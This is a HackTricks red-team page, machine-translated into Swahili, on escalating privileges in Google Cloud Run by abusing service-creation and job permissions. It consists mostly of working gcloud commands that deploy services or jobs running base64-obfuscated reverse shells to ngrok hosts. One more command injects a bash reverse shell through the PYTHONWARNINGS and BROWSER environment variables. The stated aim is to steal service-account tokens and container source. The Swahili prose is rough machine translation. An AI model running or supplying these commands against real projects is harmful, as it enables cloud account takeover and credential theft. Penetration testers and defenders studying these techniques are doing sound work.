GCP - Run Privesc

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Cloud Run

Kwa maelezo zaidi kuhusu Cloud Run angalia:

GCP - Cloud Run Enum

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

Mshambuliaji mwenye ruhusa hizi za kuunda huduma ya run inayotumia msimbo wa kawaida (konteina ya Docker ya kawaida), kuunganisha Akaunti ya Huduma nayo, na kufanya msimbo kuhamasisha tokeni ya Akaunti ya Huduma kutoka kwenye metadata.

Script ya kutumia kwa njia hii inaweza kupatikana hapa na picha ya Docker inaweza kupatikana hapa.

Kumbuka kwamba unapokuwa unatumia gcloud run deploy badala ya kuunda tu huduma inahitaji ruhusa ya update. Angalia mfano hapa.

run.services.update , iam.serviceAccounts.actAs

Kama ile ya awali lakini inasasisha huduma:

bash
# Launch some web server to listen in port 80 so the service works
echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64
# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg==

gcloud run deploy hacked \
--image=ubuntu:22.04 \  # Make sure to use an ubuntu version that includes python3
--command=bash \
--args="-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

# If you don't have permissions to use "--allow-unauthenticated", dont use it

run.services.setIamPolicy

Jipe ruhusa za awali juu ya cloud Run.

run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)

Zindua kazi yenye shell ya kurudi ili kuiba akaunti ya huduma iliyoonyeshwa katika amri. Unaweza kupata exploit hapa.

bash
gcloud beta run jobs create jab-cloudrun-3326 \
--image=ubuntu:latest \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash" \
--service-account="<sa>@$PROJECT_ID.iam.gserviceaccount.com" \
--region=us-central1

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Kama ilivyo kwa ile ya awali, inawezekana kusaidia kazi na kuboresha SA, amri na kuitekeleza:

bash
gcloud beta run jobs update hacked \
--image=mubuntu:latest \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--execute-now

run.jobs.setIamPolicy

Jipe ruhusa za awali juu ya Cloud Jobs.

run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)

Tumia mabadiliko ya mazingira ya utekelezaji wa kazi ili kutekeleza msimbo usio na mipaka na kupata shell ya kurudi ili kutupa maudhui ya kontena (msimbo wa chanzo) na kufikia SA ndani ya metadata:

bash
gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"

Marejeo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks